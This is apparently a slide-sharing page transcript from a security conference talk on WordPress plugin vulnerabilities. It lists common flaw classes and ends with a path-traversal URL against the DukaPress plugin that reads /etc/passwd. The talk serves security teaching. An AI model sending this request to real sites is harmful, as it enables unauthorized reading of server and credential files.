Cabra Arretado Aperriando o WordPress
21
$ pwd /home/espreto $ mkdir conferences/nullbyte && cd $_ $ cat > title.txt ^C $ clear
-
Upload
nullbyte-security-conference -
Category
Technology
-
view
133 -
download
1
Transcript of Cabra Arretado Aperriando o WordPress
>> talk(“plugins_the_dark_side”)
Commons Vulnerabilities
Upload Vulnerability Mechanism.
Cross-Site Scripting vulnerability (XSS).
File Download Vulnerability.
Cross-Request-Forgery Vulnerability (CSRF).
SQL Injection Vulnerability (SQL Injection).
>> talk(“http_msf_requests”)
File Read (Traversal)
http://wordpress/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../../../etc/passwd